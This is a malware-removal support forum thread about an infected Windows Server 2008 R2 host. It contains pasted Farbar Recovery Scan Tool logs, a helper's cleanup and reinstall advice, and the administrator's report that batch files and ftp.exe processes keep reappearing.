2014-02-17 17:18 - 2014-02-07 14:57 - 00000000 ____D () C:\Windows\pts_
2014-02-17 17:14 - 2014-02-15 14:23 - 00000000 ____D () C:\Windows\ric_
2014-02-15 09:21 - 2014-02-07 14:45 - 00000000 ____D () C:\Windows\xpm_
2014-02-14 13:59 - 2014-01-26 19:47 - 00001990 ____H () C:\Users\administrator.COMPANY\Documents\Default.rdp
2014-02-12 14:51 - 2014-02-12 14:51 - 00050740 _____ () C:\Users\administrator.COMPANY\Desktop\Extras.Txt
2014-02-12 14:50 - 2014-02-12 14:50 - 00060036 _____ () C:\Users\administrator.COMPANY\Desktop\OTL.Txt
2014-02-12 14:47 - 2014-02-12 14:47 - 00602112 _____ (OldTimer Tools) C:\Users\administrator.COMPANY\Desktop\OTL.exe
2014-02-11 01:07 - 2014-01-26 02:56 - 00003908 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-02-11 01:07 - 2014-01-26 02:56 - 00003656 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-02-05 11:04 - 2014-02-05 11:04 - 04380160 _____ () C:\Users\administrator.COMPANY\Desktop\RogueKillerX64.exe
2014-02-05 10:07 - 2013-11-18 09:28 - 04121952 _____ (Kaspersky Lab ZAO) C:\Users\administrator.COMPANY\Desktop\TDSSKiller.exe
2014-01-29 14:08 - 2014-01-23 11:36 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-01-29 14:03 - 2014-01-29 14:03 - 00119000 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-01-29 14:03 - 2014-01-29 14:03 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-01-29 10:56 - 2009-07-14 06:10 - 00694294 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-01-29 10:49 - 2013-11-30 11:29 - 25804800 _____ () C:\Windows\system32\vmguest.iso
2014-01-29 10:47 - 2014-01-26 03:01 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Temp\{FCE3A33B-4372-4641-8EDD-96B2A575AD29}
2014-01-29 10:47 - 2010-11-21 04:47 - 00004430 _____ () C:\Windows\PFRO.log
2014-01-29 10:47 - 2009-07-14 06:06 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-01-29 09:39 - 2014-01-29 09:39 - 00001105 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-01-29 09:39 - 2014-01-29 09:38 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-01-29 09:34 - 2014-01-29 09:34 - 10285040 _____ (Malwarebytes Corporation ) C:\Users\administrator.COMPANY\Desktop\mbam-setup-1.75.0.1300.exe
2014-01-29 09:34 - 2014-01-23 11:08 - 00000000 ____D () C:\AdwCleaner
2014-01-29 09:31 - 2014-01-23 12:08 - 00000000 ____D () C:\Program Files\ThreatExpert Memory Scanner
2014-01-26 20:07 - 2013-12-04 19:53 - 00000000 ____D () C:\Program Files (x86)\Google
2014-01-26 19:52 - 2014-01-26 19:52 - 00000000 ____D () C:\Program Files\Microsoft Security Client
2014-01-26 19:52 - 2014-01-26 19:52 - 00000000 ____D () C:\Program Files (x86)\Microsoft Security Client
2014-01-26 19:52 - 2014-01-20 15:16 - 00001945 _____ () C:\Windows\epplauncher.mif
2014-01-26 19:52 - 2014-01-20 15:15 - 00707672 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2014-01-26 03:02 - 2014-01-26 03:02 - 00001142 _____ () C:\Users\Administrator\AppData\Local\Temp\MpCmdRun.log
2014-01-26 03:02 - 2009-07-14 04:20 - 00000000 ___HD () C:\Windows\system32\GroupPolicy
2014-01-26 02:56 - 2014-01-26 02:56 - 00000000 ____D () C:\Users\Administrator\AppData\Roaming\Macromedia
2014-01-26 02:56 - 2013-12-04 19:53 - 00018911 _____ () C:\Users\Administrator\AppData\Local\Temp\chrome_installer.log
2014-01-26 02:55 - 2014-01-26 02:55 - 00000000 ____D () C:\Windows\SysWOW64\Macromed
2014-01-26 02:55 - 2014-01-26 02:55 - 00000000 ____D () C:\Windows\system32\Macromed
2014-01-23 12:58 - 2014-01-23 12:58 - 00000000 ____D () C:\Users\administrator.COMPANY\AppData\Roaming\Malwarebytes
2014-01-23 12:08 - 2014-01-23 12:08 - 01536352 _____ (Threat Expert Ltd. ) C:\Users\administrator.COMPANY\Desktop\TEMSSetup-x64.exe
2014-01-23 12:08 - 2014-01-23 12:08 - 00000890 _____ () C:\Users\Public\Desktop\ThreatExpert Memory Scanner.lnk
2014-01-23 11:36 - 2014-01-23 11:36 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-01-23 11:20 - 2014-01-23 11:20 - 12589848 _____ (Malwarebytes Corp.) C:\Users\administrator.COMPANY\Desktop\mbar-1.07.0.1009.exe
2014-01-23 11:11 - 2014-01-23 11:11 - 00000000 ____D () C:\Windows\ERUNT
2014-01-23 11:10 - 2014-01-23 11:10 - 01037068 _____ (Thisisu) C:\Users\administrator.COMPANY\Desktop\JRT.exe
2014-01-23 11:06 - 2014-01-23 11:06 - 01236282 _____ () C:\Users\administrator.COMPANY\Desktop\AdwCleaner.exe
2014-01-23 11:03 - 2014-01-23 11:03 - 05173757 _____ (Swearware) C:\Users\administrator.COMPANY\Desktop\ComboFix.exe
2014-01-23 10:52 - 2014-01-23 10:43 - 00000000 ____D () C:\Users\administrator.COMPANY\Desktop\RK_Quarantine
2014-01-20 16:01 - 2014-01-20 15:08 - 00000000 ____D () C:\Kaspersky Rescue Disk 10.0
2014-01-20 15:13 - 2014-01-20 15:13 - 00000468 _____ () C:\Users\administrator.COMPANY\AppData\Local\Temp\chrome_installer.log
2014-01-20 13:54 - 2009-07-14 05:56 - 00020484 _____ () C:\Windows\setupact.log

==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit

==================== BCD ================================

Windows Boot Manager
--------------------
identifier              {bootmgr}
device                  partition=C:
description             Windows Boot Manager
locale                  en-US
inherit                 {globalsettings}
default                 {current}
resumeobject            {131b1cf1-59f3-11e3-9a9e-18a9053c1a8b}
displayorder            {current}
toolsdisplayorder       {memdiag}
timeout                 30

Windows Boot Loader
-------------------
identifier              {current}
device                  partition=C:
path                    \Windows\system32\winload.exe
description             Windows Server 2008 R2
locale                  en-US
inherit                 {bootloadersettings}
recoverysequence        {131b1cf3-59f3-11e3-9a9e-18a9053c1a8b}
recoveryenabled         Yes
osdevice                partition=C:
systemroot              \Windows
resumeobject            {131b1cf1-59f3-11e3-9a9e-18a9053c1a8b}
nx                      OptOut
hypervisorlaunchtype    Auto

Windows Boot Loader
-------------------
identifier              {131b1cf3-59f3-11e3-9a9e-18a9053c1a8b}
device                  ramdisk=[C:]\Recovery\131b1cf3-59f3-11e3-9a9e-18a9053c1a8b\Winre.wim,{131b1cf4-59f3-11e3-9a9e-18a9053c1a8b}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
inherit                 {bootloadersettings}
osdevice                ramdisk=[C:]\Recovery\131b1cf3-59f3-11e3-9a9e-18a9053c1a8b\Winre.wim,{131b1cf4-59f3-11e3-9a9e-18a9053c1a8b}
systemroot              \windows
nx                      OptIn
winpe                   Yes

Resume from Hibernate
---------------------
identifier              {131b1cf1-59f3-11e3-9a9e-18a9053c1a8b}
device                  partition=C:
path                    \Windows\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
filedevice              partition=C:
filepath                \hiberfil.sys
debugoptionenabled      No

Windows Memory Tester
---------------------
identifier              {memdiag}
device                  partition=C:
path                    \boot\memtest.exe
description             Windows Memory Diagnostic
locale                  en-US
inherit                 {globalsettings}
badmemoryaccess         Yes

EMS Settings
------------
identifier              {emssettings}
bootems                 Yes

Debugger Settings
-----------------
identifier              {dbgsettings}
debugtype               Serial
debugport               1
baudrate                115200

RAM Defects
-----------
identifier              {badmemory}

Global Settings
---------------
identifier              {globalsettings}
inherit                 {dbgsettings}
                        {emssettings}
                        {badmemory}

Boot Loader Settings
--------------------
identifier              {bootloadersettings}
inherit                 {globalsettings}
                        {hypervisorsettings}

Hypervisor Settings
-------------------
identifier              {hypervisorsettings}
hypervisordebugtype     Serial
hypervisordebugport     1
hypervisorbaudrate      115200

Resume Loader Settings
----------------------
identifier              {resumeloadersettings}
inherit                 {globalsettings}

Device options
--------------
identifier              {131b1cf4-59f3-11e3-9a9e-18a9053c1a8b}
description             Ramdisk Options
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\131b1cf3-59f3-11e3-9a9e-18a9053c1a8b\boot.sdi



LastRegBack: 2014-02-18 15:58

==================== End Of Log ============================

Link to post
Share on other sites

Additional Log:

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 18-02-2014
Ran by Administrator at 2014-02-19 09:36:40
Running from C:\Users\administrator.COMPANY\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================


==================== Installed Programs ======================

7-Zip 9.20 (x32 Version: 9.20.00.0 - Igor Pavlov)
Active Directory Management Pack Helper Object (Version: 1.1.0 - Microsoft Corporation)
ATI Display Driver (Version: 8.24.50.5-090623a-083726C-HP - )
Google Chrome (x32 Version: 32.0.1700.107 - Google Inc.)
Google Update Helper (x32 Version: 1.3.22.5 - Google Inc.) Hidden
Headless Server Registry Update (x32 Version: 1.0.0.0 - Hewlett-Packard Company)
HP Array Configuration Utility (x32 Version: 8.50.5.0 - Hewlett Packard Development Company, L.P.)
HP Array Configuration Utility CLI (x32 Version: 8.50.6.0 - Hewlett-Packard Development Company, L.P.)
HP Insight Diagnostics  Online Edition for Windows (Version: 8.5.0 - Hewlett-Packard Development Company, L.P.)
HP Insight Management Agents (Version: 8.50.0.0 - Hewlett-Packard Company)
HP Lights-Out Online Configuration Utility (Version: 3.1.0.0 - Hewlett-Packard Development Company, L.P.)
HP ProLiant Integrated Management Log Viewer (Version: 5.24.0.0 - Hewlett-Packard Company)
HP ProLiant PCI-express Power Management Update for Windows (x32 Version: 1.3.0.0 - Hewlett-Packard Company)
HP ProLiant Remote Monitor Service (Version: 5.21.0.0 - Hewlett-Packard Company)
HP Smart Array SAS/SATA Event Notification Service (Version: 6.20.0.64 - Hewlett-Packard Development Company, L.P.)
HP System Management Homepage (x32 Version: 6.1.0 - Hewlett-Packard Company)
HP Version Control Agent (x32 Version: 6.1.0.842 - Hewlett Packard Development Company, L.P.)
Malwarebytes Anti-Malware version 1.75.0.1300 (x32 Version: 1.75.0.1300 - Malwarebytes Corporation)
Microsoft Antimalware (Version: 3.0.8107.0 - Microsoft Corporation) Hidden
Microsoft Forefront Endpoint Protection 2010 (Version: 2.0.657.0 - Microsoft Corporation)
Microsoft Forefront Endpoint Protection 2010 Server Management (Version: 2.0.0657.0 - Microsoft Corporation) Hidden
Microsoft Security Client (Version: 2.0.0657.0 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2005 Redistributable (x32 Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (Version: 8.0.59192 - Microsoft Corporation)
PFA Server Registry Update (x32 Version: 1.0.0.0 - Hewlett-Packard Company)
System Center 2012 - Operations Manager Gateway (Version: 7.0.9538.0 - Microsoft Corporation)
ThreatExpert Memory Scanner 1.0 (Version: 1.0.1.0 - Threat Expert Ltd.)

==================== Restore Points  =========================

Could not list Restore Points. Check "winmgmt" service or repair WMI.


==================== Hosts content: ==========================

2009-07-14 03:34 - 2013-12-03 19:46 - 00000862 ____A C:\Windows\system32\Drivers\etc\hosts
188.122.70.10         scom01.asapnet.local

==================== Scheduled Tasks (whitelisted) =============

Task: {3B2389C6-7580-402B-8965-1F13A16077D7} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-26] (Google Inc.)
Task: {63EE8552-A444-4BA2-8E1E-C8350D6D412A} - System32\Tasks\Microsoft\Windows\Server Manager\ServerManager => C:\Windows\system32\ServerManagerLauncher.exe [2009-07-14] (Microsoft Corporation)
Task: {69110D7B-41DC-4E9D-BDD3-C826C7DB613B} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Server\ServerRoleUsageCollector => C:\Windows\system32\ceipdata.exe [2010-11-21] (Microsoft Corporation)
Task: {7141E73B-D3DA-4BF7-B79B-B443DC38A0B9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-26] (Google Inc.)
Task: {815E046D-8DB5-440B-84D3-FDCA723411E6} - System32\Tasks\Microsoft\Windows\Backup\Microsoft-Windows-WindowsBackup => C:\Windows\System32\wbadmin.exe [2009-07-14] (Microsoft Corporation)
Task: {AFECE848-8DA2-461B-B5E6-CBEF57A4DF7D} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Server\ServerRoleCollector => C:\Windows\system32\ceiprole.exe [2010-11-21] (Microsoft Corporation)
Task: {D49A10DA-0F70-4779-BD96-B2D976A4F2E3} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Server\ServerCeipAssistant => C:\Windows\system32\ceipdata.exe [2010-11-21] (Microsoft Corporation)
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2009-06-25 15:54 - 2009-06-25 15:54 - 00027136 _____ () C:\hp\hpsmh\data\cgi-bin\vcagent\XalanMessages_1_10.dll
2013-11-30 11:21 - 2009-05-13 15:34 - 00255488 _____ () C:\hp\hpsmh\data\cgi-bin\vcagent\SSLEAY32.dll
2013-11-30 11:21 - 2009-05-13 15:34 - 01362944 _____ () C:\hp\hpsmh\data\cgi-bin\vcagent\LIBEAY32.dll
2013-12-07 07:20 - 2013-12-07 07:20 - 00192512 _____ () C:\Windows\system32\sclient.exe
2010-04-28 16:37 - 2010-04-28 16:37 - 00048128 _____ () C:\Windows\system32\CpqNiMgt\CPQNIMIB.DLL
2010-04-28 16:36 - 2010-04-28 16:36 - 00205824 _____ () C:\Windows\system32\cpqnimgt\w2kmgdll.dll
2010-04-28 16:33 - 2010-04-28 16:33 - 00018432 _____ () C:\Windows\system32\cpqnimgt\cqnisnmp.dll
2010-04-28 16:37 - 2010-04-28 16:37 - 00025088 _____ () C:\Windows\system32\CpqNiMgt\NICMIB.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00193024 _____ () C:\Windows\system32\CpqMgmt\Cqmgstor\stormib.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00030720 _____ () C:\Windows\system32\cqstrutl.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00007168 _____ () C:\Windows\system32\cpqmgmt\cqmgstor\storsnmp.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00027648 _____ () C:\Windows\system32\CpqMgmt\CqmgStor\iscsimib.dll
2013-11-30 11:20 - 2009-07-23 11:57 - 01531392 _____ () C:\hp\hpsmh\bin\libxml2.dll
2013-11-30 11:20 - 2009-03-09 18:08 - 00072704 _____ () C:\hp\hpsmh\bin\zlib1.dll
2010-04-28 16:36 - 2010-04-28 16:36 - 00205824 _____ () C:\Windows\system32\CPQNiMgt\w2kmgdll.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00032768 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CQMGSTOR.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00043008 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQIDE.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00041472 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQMDISK.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00057856 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQMSCSI.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00091136 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQMIDA.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00115200 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQFCA.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00050176 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQISCSI.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00030720 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\STORALRT.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00050176 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQSAS.DLL
2013-11-30 11:20 - 2010-01-28 11:10 - 01411584 _____ () C:\hp\hpsmh\bin\LIBEAY32.dll
2013-11-30 11:20 - 2010-01-28 11:04 - 00266240 _____ () C:\hp\hpsmh\bin\SSLEAY32.dll
2013-11-30 11:20 - 2009-07-23 11:57 - 01531392 _____ () C:\hp\hpsmh\modules\libxml2.dll

==================== Alternate Data Streams (whitelisted) =========


==================== Safe Mode (whitelisted) ===================


==================== Disabled items from MSCONFIG ==============


==================== Faulty Device Manager Devices =============

Name: HP NC326i PCIe Dual Port Gigabit Server Adapter #2
Description: HP NC326i PCIe Dual Port Gigabit Server Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard Company
Service: q57nd60a
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (02/18/2014 09:00:28 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation attempted at '2014-02-18T20:00:28.657531100Z' has failed to start, error code '2155348061' (%%2155348061). Please review the event details for a solution, and then rerun the backup operation once the issue is resolved.

Error: (02/18/2014 09:00:28 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation that started at '1601-01-01T00:00:00.000000000Z' has failed because no backup storage location could be found. Please confirm that the backup storage location is attached and online, and then rerun the backup operation.

Error: (02/17/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation attempted at '2014-02-17T20:00:22.935534100Z' has failed to start, error code '2155348061' (%%2155348061). Please review the event details for a solution, and then rerun the backup operation once the issue is resolved.

Error: (02/17/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation that started at '1601-01-01T00:00:00.000000000Z' has failed because no backup storage location could be found. Please confirm that the backup storage location is attached and online, and then rerun the backup operation.

Error: (02/16/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation attempted at '2014-02-16T20:00:22.359033800Z' has failed to start, error code '2155348061' (%%2155348061). Please review the event details for a solution, and then rerun the backup operation once the issue is resolved.

Error: (02/16/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation that started at '1601-01-01T00:00:00.000000000Z' has failed because no backup storage location could be found. Please confirm that the backup storage location is attached and online, and then rerun the backup operation.

Error: (02/16/2014 01:54:09 AM) (Source: Winlogon) (User: )
Description: The Windows logon process has unexpectedly terminated.

Error: (02/15/2014 09:00:20 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation attempted at '2014-02-15T20:00:20.691355600Z' has failed to start, error code '2155348061' (%%2155348061). Please review the event details for a solution, and then rerun the backup operation once the issue is resolved.

Error: (02/15/2014 09:00:20 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation that started at '1601-01-01T00:00:00.000000000Z' has failed because no backup storage location could be found. Please confirm that the backup storage location is attached and online, and then rerun the backup operation.

Error: (02/14/2014 09:00:09 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation attempted at '2014-02-14T20:00:09.979196700Z' has failed to start, error code '2155348061' (%%2155348061). Please review the event details for a solution, and then rerun the backup operation once the issue is resolved.


System errors:
=============
Error: (02/19/2014 09:33:26 AM) (Source: UmrdpService) (User: )
Description: Driver Canon LBP6750/3560 Class Driver required for printer Canon-506 is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/19/2014 09:33:23 AM) (Source: UmrdpService) (User: )
Description: Driver Microsoft XPS Document Writer v4 required for printer Microsoft XPS Document Writer is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/19/2014 09:33:22 AM) (Source: UmrdpService) (User: )
Description: Driver PDFCreator required for printer PDFCreator is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/19/2014 09:33:22 AM) (Source: UmrdpService) (User: )
Description: Driver Canon iR C2880/C3380 Class Driver required for printer iR C3380 is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/19/2014 09:33:21 AM) (Source: UmrdpService) (User: )
Description: Driver Send to Microsoft OneNote 15 Driver required for printer Send To OneNote 2013 is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/19/2014 09:33:19 AM) (Source: UmrdpService) (User: )
Description: Driver TOSHIBA Universal Printer 2 required for printer !!olamserver.olam.local!TOSHIBA eSTUDIO 2550 is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/19/2014 02:52:42 AM) (Source: Microsoft Antimalware) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.167.106.0

    Update Source: %NT AUTHORITY49

    Update Stage: 3.0.8107.00

    Source Path: 3.0.8107.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\SYSTEM

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (02/19/2014 02:25:23 AM) (Source: Microsoft Antimalware) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.167.90.0

    Update Source: %NT AUTHORITY49

    Update Stage: 3.0.8107.00

    Source Path: 3.0.8107.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\SYSTEM

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (02/18/2014 06:52:43 PM) (Source: Microsoft Antimalware) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.167.52.0

    Update Source: %NT AUTHORITY49

    Update Stage: 3.0.8107.00

    Source Path: 3.0.8107.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\SYSTEM

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (02/18/2014 03:01:31 PM) (Source: Service Control Manager) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the NlaSvc service.


Microsoft Office Sessions:
=========================
Error: (02/18/2014 09:00:28 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 2014-02-18T20:00:28.657531100Z2155348061%%2155348061

Error: (02/18/2014 09:00:28 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 1601-01-01T00:00:00.000000000Z

Error: (02/17/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 2014-02-17T20:00:22.935534100Z2155348061%%2155348061

Error: (02/17/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 1601-01-01T00:00:00.000000000Z

Error: (02/16/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 2014-02-16T20:00:22.359033800Z2155348061%%2155348061

Error: (02/16/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 1601-01-01T00:00:00.000000000Z

Error: (02/16/2014 01:54:09 AM) (Source: Winlogon)(User: )
Description:

Error: (02/15/2014 09:00:20 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 2014-02-15T20:00:20.691355600Z2155348061%%2155348061

Error: (02/15/2014 09:00:20 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 1601-01-01T00:00:00.000000000Z

Error: (02/14/2014 09:00:09 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 2014-02-14T20:00:09.979196700Z2155348061%%2155348061


==================== Memory info ===========================

Percentage of memory in use: 98%
Total physical RAM: 14325.74 MB
Available physical RAM: 153.45 MB
Total Pagefile: 37900.44 MB
Available Pagefile: 2945.87 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:60 GB) (Free:22.43 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (Hyper-V) (Fixed) (Total:486.8 GB) (Free:145.4 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 547 GB) (Disk ID: 9C84BF43)
Partition 1: (Active) - (Size=60 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=487 GB) - (Type=07 NTFS)

==================== End Of Log ============================

Link to post
Share on other sites

  • Root Admin

Well first and foremost as this is a Server that has been compromised one should really delete the partitions, recreate, format, and reinstall Windows.  Then restore settings and data to a previous date before this infection took place.  There is never a 100% guarantee that the system will be cleaned completely of all malware.

 

That said the logs don't seem to indicate that any hidden process is running the miner anymore that I'm seeing.

 

I would recommend starting an elevated admin command prompt and change directory to here:  C:\Windows\SysWOW64

Then issue the following command:  DEL    TMP*.CMD

 

On another note as this is a Server - unless used as a Terminal Server no one should be browsing the web from the system including Admins.  That is a no no for any server.

As such I'd recommend removing Chrome and any other Google software not 100% essential for business use.  Possibly look at implementing some software restrictions on the Server as well to prevent undesirable software from running.  I've not used Microsoft Forefront in a long time but generally speaking Microsoft is not well known for their antivirus/security software and if possible I'd recommend using another product designed for server use from maybe Symantec, or Kaspersky.

 

I would highly recommend at least FULLY disabling Forefront, MSE and installing maybe a Trial of Symantec or Kaspersky and doing a Full System scan with it.

 

So after doing the removal of the .CMD files - how is the computer running now?

Link to post
Share on other sites

AdvancedSetup,

 

The .cmd files keep coming back. Taskmgr shows 4 instances of cmd.exe *32 and 2 instances of ftp.exe *32 which is trying to repopulate the taneschka, mtc, pts, ric and xpm folders, but is quite unsuccessful since I've blocked ftp.exe in the firewall. However, *something* keeps placing the CMD files there and kicking them off. Also, I have never installed Google Chrome, seems (weird and unlikely) this was also done by the malware. I've actually removed it quite a few times already.

 

This is still very much unsolved. I was hoping to be able to completely clean the server (and learn something in the process) but seems we're gonna have to default to a complete reinstall. Too bad.

 

Thanks for your assistance so far.

Link to post
Share on other sites

  • Root Admin

Okay, let me get a new FRST scan and we'll see what we can find.

 

Please download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatibale with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.

 

Also please run an elevated admin command prompt and run the following

 

netstat -f -n -b -o

 

You can redirect to a text file to upload using the following

 

netstat -f -n -b -o >c:\MyConnections
Link to post
Share on other sites

FRST.log:

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 23-02-2014 02
Ran by Administrator (administrator) on COMPANY-HV on 24-02-2014 09:53:04
Running from C:\Users\administrator.COMPANY\Desktop
Windows Server 2008 R2 Standard Service Pack 1 (X64) OS Language: English(US)
Internet Explorer Version 10
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe
(Microsoft Corporation) C:\Windows\system32\LogonUI.exe
(Hewlett-Packard Company) C:\Program Files\HP\Cissesrv\cissesrv.exe
(Hewlett-Packard Company) C:\Windows\system32\cpqrcmc.exe
(Hewlett-Packard Company) C:\hp\hpsmh\data\cgi-bin\vcagent\vcagent.exe
(Microsoft Corp.) C:\Program Files\System Center Operations Manager\Gateway\HealthService.exe
(Microsoft Corporation) C:\Windows\System32\snmp.exe
(Hewlett-Packard Company) C:\Windows\system32\sysdown.exe
